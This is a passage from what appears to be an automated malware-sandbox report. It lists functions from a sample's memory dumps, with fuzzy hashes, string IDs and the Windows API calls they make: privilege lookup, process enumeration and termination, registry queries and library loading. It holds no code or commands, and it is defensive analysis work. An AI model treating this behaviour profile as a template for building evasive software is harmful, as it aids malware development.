                                  • Opcode ID: 0c3d0870c49be31b67d4f7e71f1005032520b9b184b3aa862899ef5872441a3c
                                  • Instruction ID: 757c6ba5c303654c2f74105146b8c9cef0d25a3b58c416ad8023886f98313ef0
                                  • Opcode Fuzzy Hash: 0c3d0870c49be31b67d4f7e71f1005032520b9b184b3aa862899ef5872441a3c
                                  • Instruction Fuzzy Hash: 809120B0D052499FCB04DFAAD5805AEBFF2BF89310F24C92AE015BB255D7349A41DF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00535C98, Relevance: .2, Instructions: 175COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 585c4e4a21d406ac4771d9891e61b98d3b031c0cb3bd03efaf7decff64275933
                                  • Instruction ID: 68413838b88b59284edb97a25a1415fe37a447732260f9692a7ca22dadc13e23
                                  • Opcode Fuzzy Hash: 585c4e4a21d406ac4771d9891e61b98d3b031c0cb3bd03efaf7decff64275933
                                  • Instruction Fuzzy Hash: 097137B0D015088FDB04DFEAD5845ADFBF2BF88320F24D665E464AB395E7349A41CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00536A38, Relevance: .2, Instructions: 170COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb65b20dec7f4ece58a2e18841247510800e7275841b3688c37b73910296c79a
                                  • Instruction ID: c47b4f710a989ef9c41f9c0c0945593694062de275559d5f857a4f1457554097
                                  • Opcode Fuzzy Hash: bb65b20dec7f4ece58a2e18841247510800e7275841b3688c37b73910296c79a
                                  • Instruction Fuzzy Hash: 1F71D074E01219EFDB08CFA5D944AAEBBB2FF89300F20952AD405BB354DB749A45CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053D150, Relevance: .1, Instructions: 144COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1e1a1179b1ee889f90802631b3a5434a227e88722607cffacc86497aa3881d7c
                                  • Instruction ID: 74b10d06d3bfbcff8d0a3ef778d59f88e017a17d42756e3f36c3119f3ce86868
                                  • Opcode Fuzzy Hash: 1e1a1179b1ee889f90802631b3a5434a227e88722607cffacc86497aa3881d7c
                                  • Instruction Fuzzy Hash: 2F516874D05219DFDB00CFA5E980AAEFBF2BF89310F24C56AD411B7254D3349A00CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00537178, Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 825ff570bb9c487943296186396b5e079429bd852ea69e7fabdf6d7e6efdd8d7
                                  • Instruction ID: 91e359ddd160d356b35faab69e110d29d695aaaf166c1a23767d08427de1ffa2
                                  • Opcode Fuzzy Hash: 825ff570bb9c487943296186396b5e079429bd852ea69e7fabdf6d7e6efdd8d7
                                  • Instruction Fuzzy Hash: 505136B5D092098FCB18CFE5D5845AEFBF2FF8D300F24946AE415A7215D7348A41CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00535C89, Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08f25cf23ef1c93499bc25999985ba6397affd6a3d35bfbd528475e92f143059
                                  • Instruction ID: 272a94c2389b1317f88df7903a57aaeaa87f7be7d04696d6acf0070f7887eb42
                                  • Opcode Fuzzy Hash: 08f25cf23ef1c93499bc25999985ba6397affd6a3d35bfbd528475e92f143059
                                  • Instruction Fuzzy Hash: 06413770D019089FDB04DFEAD98469DFBF2BF98320F24C669E454AB395EB349A01CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00537A90, Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab97add541b2fbb3ec47f71c04dde06085664b76bdf0d925991e4edaacb28862
                                  • Instruction ID: 5fbd9d43434036394e414ed957fb859089ae549d0a8db6c9f8dddfb534ab0567
                                  • Opcode Fuzzy Hash: ab97add541b2fbb3ec47f71c04dde06085664b76bdf0d925991e4edaacb28862
                                  • Instruction Fuzzy Hash: 233108B1E056588BDB19CFAAD8547DEFBB2AFC9300F14C1AAD409AB265DB340A45CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00530280, Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: (b($(b($(b($(b(
                                  • API String ID: 0-2442200876
                                  • Opcode ID: ecae705ae99f14a281be1dda1cd4da90db80835a6353943a5cc624901e447440
                                  • Instruction ID: 034d34ffecb8c77200b2979c5856853aeebadba230018c56d1e40005b2532268
                                  • Opcode Fuzzy Hash: ecae705ae99f14a281be1dda1cd4da90db80835a6353943a5cc624901e447440
                                  • Instruction Fuzzy Hash: 3B419D78A00208DFDB04DFA8C994BADBBF1BF4E310F1058A5E501AB3A0D738A944DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005305A8, Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: :@lq$\,($he(
                                  • API String ID: 0-599648643
                                  • Opcode ID: 7caa3571dfa6556bad5dd3a9684a8c7201377584ef3ea298509423fd8702d679
                                  • Instruction ID: 5f7e9b20e6703702947c03f3916f9541dceaff017519f8e2f25f12713753e7b0
                                  • Opcode Fuzzy Hash: 7caa3571dfa6556bad5dd3a9684a8c7201377584ef3ea298509423fd8702d679
                                  • Instruction Fuzzy Hash: 9491E274E01218CFDB14DFA9C994BADBBB2BF89314F209069D409AB391DB31AD85CF11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00400400, Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117803755.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: k(l$k(l
                                  • API String ID: 0-4029483140
                                  • Opcode ID: ac1f88f0ad600589dc812b498ab7b06b8c190841251ba1b54e3933ab6e45c726
                                  • Instruction ID: 18b203882e6a4adc4d72ba843848e98ea37a6a9b96832d37999b0a2f57590d64
                                  • Opcode Fuzzy Hash: ac1f88f0ad600589dc812b498ab7b06b8c190841251ba1b54e3933ab6e45c726
                                  • Instruction Fuzzy Hash: 4801AF75C4162CCECB20DF61C889BDDBBB1AB28314F2041D9D50977251C7398B86DF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005706A5, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0057076A
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 10fc438b7f555c4a7da83699cffe6a908f4faaba22e9af812bb7e15ebce5ee54
                                  • Instruction ID: 5c882224d4deb171d17f0b687f05076d88eade2eb6d3a03313168b230d0e4732
                                  • Opcode Fuzzy Hash: 10fc438b7f555c4a7da83699cffe6a908f4faaba22e9af812bb7e15ebce5ee54
                                  • Instruction Fuzzy Hash: 6641167150E3C09FD7538B358C65A92BFB4AF17210F0A84DBD884CF1A3D269A849DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023AB26, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0023ABD5
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 6e2a02ba3fc62babd24b35ca4e620347e9dafd04088f53ee206d3b566288e0a5
                                  • Instruction ID: eaeb02aaccfc0602b345c283f70877970a542e167c6fe74c500f773935e1414b
                                  • Opcode Fuzzy Hash: 6e2a02ba3fc62babd24b35ca4e620347e9dafd04088f53ee206d3b566288e0a5
                                  • Instruction Fuzzy Hash: DB31A2B2504384AFE722CF11CC45FA7BBACEF06350F0885ABF9858B152D265A909C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023AC1D, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,E306C970,00000000,00000000,00000000,00000000), ref: 0023ACD8
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: e4657e0a91312cb0a9474bb66b9fb8b040bf8da5e7ecbd118ab630a6d89b10d0
                                  • Instruction ID: b6006d5bceee37db786bdb7f319a6d321dd09aaece5c06b38e939fd3e335a160
                                  • Opcode Fuzzy Hash: e4657e0a91312cb0a9474bb66b9fb8b040bf8da5e7ecbd118ab630a6d89b10d0
                                  • Instruction Fuzzy Hash: FB31A2755053849FE722CF21CC45FA2BFB8EF06310F08849AE985CB153D264E949CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570AF0, Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(?,00000E40,E306C970,00000000,00000000,00000000,00000000), ref: 00570B84
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 9ec1f84cd43f3e0a9bf6cbe5b250b26b91162c9aaedda77d85a9fb0dc6be5cf4
                                  • Instruction ID: 3b464755e838e128401b1afff297cba05eb3c1b213cc501b385de7a1a098bd76
                                  • Opcode Fuzzy Hash: 9ec1f84cd43f3e0a9bf6cbe5b250b26b91162c9aaedda77d85a9fb0dc6be5cf4
                                  • Instruction Fuzzy Hash: 6421B5B2509380AFE712CB20DC45B96BFB8EF06324F0984DBE988DF193D265A945C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023B074, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 0023B10E
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: ConsoleCtrlHandler
                                  • String ID:
                                  • API String ID: 1513847179-0
                                  • Opcode ID: 944958426a642a67c4b65872bda6c6e47d5c16d59bc543a0e7e4879da29f0c26
                                  • Instruction ID: 39342dea8c936852d89287fe377425bb54fa7c028fe798ac6247a530a0e405d6
                                  • Opcode Fuzzy Hash: 944958426a642a67c4b65872bda6c6e47d5c16d59bc543a0e7e4879da29f0c26
                                  • Instruction Fuzzy Hash: A121A77150D7C06FD3138B259C51B62BFB4EF47610F0A41DBE884CB5A3D2256919C7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023AB56, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0023ABD5
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 673ff970f5b39fe5343d86c64bbcc998b9cb133fbef63a89f5b6c007cbcfcb10
                                  • Instruction ID: 6806668c7cc5275c7952791fec39453c2bac71778eaed6a16b0abc17db356c57
                                  • Opcode Fuzzy Hash: 673ff970f5b39fe5343d86c64bbcc998b9cb133fbef63a89f5b6c007cbcfcb10
                                  • Instruction Fuzzy Hash: FC21A1B2500304EFFB20DF11DC45F6BF7ACEF14750F04856AF9459A241D675E9098AB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570938, Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                  Download Yara Rule
                                  APIs
                                  • K32EnumProcesses.KERNEL32(?,?,?), ref: 005709B2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: EnumProcesses
                                  • String ID:
                                  • API String ID: 84517404-0
                                  • Opcode ID: 1da0968536776d251e96e9ace28c5943a4a940ec0e6918599cdbc5461f25aa53
                                  • Instruction ID: c52b632d0fe4f2de1441561c1ff98de11a73740e121500a60a1a4cc69bd25b47
                                  • Opcode Fuzzy Hash: 1da0968536776d251e96e9ace28c5943a4a940ec0e6918599cdbc5461f25aa53
                                  • Instruction Fuzzy Hash: 6F2174725093C09FEB12CB25DC55B96BFE4EF07310F0984DAD9848F163D275A908DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023AC5E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,E306C970,00000000,00000000,00000000,00000000), ref: 0023ACD8
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: fabf930be2549a434e65cee73618b112ebf374ce66e8e57ba3b7c254b571ea40
                                  • Instruction ID: b7f7e47e6f33265fa0c0b53662991218b9aba30e325ebfe29257c88618765274
                                  • Opcode Fuzzy Hash: fabf930be2549a434e65cee73618b112ebf374ce66e8e57ba3b7c254b571ea40
                                  • Instruction Fuzzy Hash: F4219DB5610704AFEB20CF15CC85F66F7ECEF04710F04896AE9859B651D760E958CA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570006, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 00570083
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: DrawText
                                  • String ID:
                                  • API String ID: 2175133113-0
                                  • Opcode ID: a55a1ca85033d042c669152cec660df4d8f2ec55b1d4fe9baddff4acf7ab4a25
                                  • Instruction ID: f1af26ce6a1e5c55229266858cf937df72f49b45b29a8b456f927bfbc2a5e5b2
                                  • Opcode Fuzzy Hash: a55a1ca85033d042c669152cec660df4d8f2ec55b1d4fe9baddff4acf7ab4a25
                                  • Instruction Fuzzy Hash: 18214F715093849FDB22CF25DC44B52BFF4EF06310F09849AE989CB6A3D275E808DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023B46D, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0023B4E9
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadShim
                                  • String ID:
                                  • API String ID: 1475914169-0
                                  • Opcode ID: f6f39c7a5d44a6896411a9a81c6e5159667ccc7d2ebd00fa57750fa1a4ff6350
                                  • Instruction ID: aa20bc4d5b68e03be4672aed1b3185a18b901a9c668d2f1e3d8a8511f5f3a2f8
                                  • Opcode Fuzzy Hash: f6f39c7a5d44a6896411a9a81c6e5159667ccc7d2ebd00fa57750fa1a4ff6350
                                  • Instruction Fuzzy Hash: 7D2193B15093849FD722CE15DC45B62BFE8EF56710F08808AED848B253D365E818C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023B3C0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: Atom
                                  • String ID:
                                  • API String ID: 2154973765-0
                                  • Opcode ID: 92f5a6e49f07eb30b4a39c122a7bf7f3a0687821a5b5aa39dfd236d046dac3d4
                                  • Instruction ID: 06ee56b234310e5f60281b91d51475ce7d05390009e541bbb948f5470b10b4d1
                                  • Opcode Fuzzy Hash: 92f5a6e49f07eb30b4a39c122a7bf7f3a0687821a5b5aa39dfd236d046dac3d4
                                  • Instruction Fuzzy Hash: A5212E715093C49FD712CF25DC45B92BFE4EF16610F0984EAD988CF263D265A918CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570C75, Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 052dccd94010f6c979d5f0dff8544c8d00b1d7b888af07ee3b3c14a92157de18
                                  • Instruction ID: dc2259e52124938840b7ad83d1138c49ade019e1161dca1f57abcb513183effa
                                  • Opcode Fuzzy Hash: 052dccd94010f6c979d5f0dff8544c8d00b1d7b888af07ee3b3c14a92157de18
                                  • Instruction Fuzzy Hash: 05219D715093C09FDB238F25DC44A92BFB0EF17310F0984DBE9888F563D225A858DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023A5AF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0023A61A
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: a08c744194eb976d9bd62dccd3a282ca0c3ea5e939ed5b45a02a68f8c1b64608
                                  • Instruction ID: ab3f6a8a652b4b9a9f258dfcdb50594ad05507510dfecb7382fe4522445076e7
                                  • Opcode Fuzzy Hash: a08c744194eb976d9bd62dccd3a282ca0c3ea5e939ed5b45a02a68f8c1b64608
                                  • Instruction Fuzzy Hash: AF117271509380AFDB228F51DC44B62FFF4EF4A310F08849AED858B552D276A418DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570B2E, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(?,00000E40,E306C970,00000000,00000000,00000000,00000000), ref: 00570B84
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 1e752e87dc7a930cf0abe55ad6214905f106abe65b94adc3844b38fe83b6f59f
                                  • Instruction ID: 555725aad5d9c068b7149009292b89620e304bbda6f3eb8c6d80b982ea394c25
                                  • Opcode Fuzzy Hash: 1e752e87dc7a930cf0abe55ad6214905f106abe65b94adc3844b38fe83b6f59f
                                  • Instruction Fuzzy Hash: F011A071501300EFFB10CF65DC85BAABBD8EF05724F14C8AAED09DB281D674AA449AB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023A65A, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(?), ref: 0023A6CC
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: bc50a04e312b425e6bdc20a10827c0dad78656f5c2bf5e694f388e2dc32fd876
                                  • Instruction ID: 7efe89175ef72ed32d3284b2c4d88cf58fe696c2e8e3659ff3cf7a578fb159e1
                                  • Opcode Fuzzy Hash: bc50a04e312b425e6bdc20a10827c0dad78656f5c2bf5e694f388e2dc32fd876
                                  • Instruction Fuzzy Hash: 78116A7550D3C49FDB128B25CC95A52BFB4EF07220F0E80DBD9858F1A3D269A948CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570E85, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: DestroyWindow
                                  • String ID:
                                  • API String ID: 3375834691-0
                                  • Opcode ID: e1f7e0264dc27f37107bd30af4b2932e8ece4c1228cb6575d1351910f6962b64
                                  • Instruction ID: 3d3d4a845b4d9a658ec22d192b00de179a2776098e601a75faa1117ab10a0443
                                  • Opcode Fuzzy Hash: e1f7e0264dc27f37107bd30af4b2932e8ece4c1228cb6575d1351910f6962b64
                                  • Instruction Fuzzy Hash: 551104755097C09FD7128B25EC84B52BFB4EF03210F0880DBED848B2A3D265A908DB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00571007, Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: b6f1cf4a6e4ab5f10cd6e7fd352b16bd650277852835b7c1858b00832f5df24b
                                  • Instruction ID: c977c92720c40533ac33789fbea559526d71c271c9afd95cf9f58e915f6fc6a7
                                  • Opcode Fuzzy Hash: b6f1cf4a6e4ab5f10cd6e7fd352b16bd650277852835b7c1858b00832f5df24b
                                  • Instruction Fuzzy Hash: C111D0715097809FDB228F15DC49B52FFB4EF06320F08849EED894B563C266A858DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570722, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0057076A
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: dd74d946d45c933a42b4e9cb3a92529ff6387700a5e319eaed26a6105afb541b
                                  • Instruction ID: c1b8c5c07ed7d7df0f4b0c0f3d41989af36b96b12bc19b56c985f43ae8ed2271
                                  • Opcode Fuzzy Hash: dd74d946d45c933a42b4e9cb3a92529ff6387700a5e319eaed26a6105afb541b
                                  • Instruction Fuzzy Hash: D2117CB1600300DFEB64CF29EC85B56FBD8EB14220F08C46ADC49CB682D671E804DA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570032, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule
                                  APIs
                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 00570083
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: DrawText
                                  • String ID:
                                  • API String ID: 2175133113-0
                                  • Opcode ID: ada2fd518f98b90c87d2fd8e50129688b8aefaf8d2b79db8345cc06423b2c49d
                                  • Instruction ID: cecbabc4f3e5c4b23a06e7445729d8a6fe371e5b675f6d393948761a5aa2acb7
                                  • Opcode Fuzzy Hash: ada2fd518f98b90c87d2fd8e50129688b8aefaf8d2b79db8345cc06423b2c49d
                                  • Instruction Fuzzy Hash: F7113671500704DFEB20CF65E888B62FBE4FB04720F48C4AADD498A692D275E804EA62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570972, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • K32EnumProcesses.KERNEL32(?,?,?), ref: 005709B2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: EnumProcesses
                                  • String ID:
                                  • API String ID: 84517404-0
                                  • Opcode ID: cd7cb4d7f916f307fa2e58dc6211a615e82a7b3ef275d96fe4b8a65e12cbfffd
                                  • Instruction ID: 657d524fcefa82b73c396fa54f0e1a0ee8013a36a4b854f6c3c7c5928b840b3f
                                  • Opcode Fuzzy Hash: cd7cb4d7f916f307fa2e58dc6211a615e82a7b3ef275d96fe4b8a65e12cbfffd
                                  • Instruction Fuzzy Hash: C0115E75500244DFEB10CF65D885B56FBE4FF05320F08C4AADE498B652D671E844DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023B49E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0023B4E9
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadShim
                                  • String ID:
                                  • API String ID: 1475914169-0
                                  • Opcode ID: 36aac409f06085f972ecbee6faee60916be2df68fc00907a7ac540462cdb4f6f
                                  • Instruction ID: 552b96c85f00e5c582c6ee8530dfcaf2fb5192e738c1048dc9b44495cecdec58
                                  • Opcode Fuzzy Hash: 36aac409f06085f972ecbee6faee60916be2df68fc00907a7ac540462cdb4f6f
                                  • Instruction Fuzzy Hash: 60019EB1610700DFEB21CF16D885B22FBE4EF14720F08809ADE498B752D371E814CA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023A5D6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0023A61A
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: a83279f3cd3658d0608332b9a26d5834b865cd7606e89f8d403ea3f97ae5600f
                                  • Instruction ID: f28d2e01ad219aa650e5fa10e77eea9561369c5e3c62bd603ef36597d599a07d
                                  • Opcode Fuzzy Hash: a83279f3cd3658d0608332b9a26d5834b865cd7606e89f8d403ea3f97ae5600f
                                  • Instruction Fuzzy Hash: FB018B72410700DFDF218F51D845B52FFE4EF18720F0884AADE894A612C276A424DF62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023B3F2, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: Atom
                                  • String ID:
                                  • API String ID: 2154973765-0
                                  • Opcode ID: 685d31d4355749851c2299d5b60781da07dbb5f0dd0873d15b796009862ea76d
                                  • Instruction ID: cfd9ea135f883ae2113598ceb738b095145f7e05ad90fed0ab78fdf996a9d889
                                  • Opcode Fuzzy Hash: 685d31d4355749851c2299d5b60781da07dbb5f0dd0873d15b796009862ea76d
